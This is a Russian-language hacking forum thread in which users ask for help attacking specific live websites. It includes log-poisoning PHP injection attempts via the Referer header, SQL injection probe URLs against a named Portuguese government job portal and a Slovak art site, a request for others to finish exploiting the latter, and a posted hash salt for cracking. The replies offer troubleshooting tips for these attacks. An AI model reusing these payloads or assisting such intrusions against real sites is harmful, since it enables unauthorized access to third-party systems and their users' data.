Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Есть php-иньекция.
    пытаюсь записать в http-access.log строчку <?php 'phpinfo';?> через refererr
    Записалось успешно. Но ничего не отображает.
    Если открыть исходник страницы, вылезет та самая строчка.
    ОСь -freebsd 6.2

    В чем проблема?
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    если я не ошибаюсь, phpinfo надо без кавычек писать
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    <?php phpinfo()?>
    МБ?
     
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Вбил <?php phpinfo()?> - тоже самое
    В логах:
     
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    GET host <?php phpinfo() ?>

    error_log
     
  6. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    попробовал.
    Написал:
     
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Инклудь тогда аццесс лог, но что то мне кажется что там у тебя не инклуд а читалка
     
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Таки да, читать файлы я могу.
    Там есть чат на файловой БД, внес туда строчку <?php echo 'hello'; ?>(для теста) - попробовал проинклудить - тот же результат.
    То ли система, то ли еще что-то на корню режет php строки.
     
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Как верно подметил .Slip это скорее всего читалка файлов(то есть файлы не include а например fopen,file_get_contents и т.п. и выводяться в браузер), и ничего не режеться(ну и strip_tags там вот в добавок и теги не видешь с пхп).
     
    #6109 PaCo, 26 Mar 2009
    Last edited: 26 Mar 2009
  10. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    coлёный md5($pass.$salt)
    Z1RKNCslakgoAAuq55wasFVX8zGRYkIa - соль
     
    2 people like this.
  11. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Нашёл блинд инж, подобрал поля

    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
    не пашет )':, видимо двойной запрос.

    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(),1,1)=5--
    +and+substring(version(),1,1)=4--
    +and+substring(version(),1,1)=3--

    так же результатов не дало.
    Помогите хотя бы определить версию.
    Подзапросы не работают у меня вообще! =(
     
  12. Booblekus

    Booblekus New Member

    Joined:
    26 Nov 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А почему ты решил что это вообще MySQL?.
     
  13. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://fineart.sk/index.php?cat=-1+group+by+7--
    сможет кто раскрутить? сам пробовал, не удалось даже версию узнать -/
     
  14. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    А почему ты спрашиваешь?Посты набиваешь?
    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

    и

    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+3--

    и

    http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2

    Догадайся почему.
    З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD

    Соответственно блинд,разве нет?
     
  15. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    2 Calcutta
    режет запятые.. даже слепую не заюзать.
     
  16. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Ну я бы так не сказал все зависит от настроек сервака, ты забываешь еще и про pgsql
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Обнаружил при сниффере параметр на передачу он выглядит так примерно

    pay=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C

    Как каракули понять такие?
     
  18. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    urldecode
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А ведь это реально каракули -
     
    1 person likes this.
  20. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    echo iconv("UTF-8","cp1251",urldecode("%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C"));
     
    5 people like this.
Thread Status:
Not open for further replies.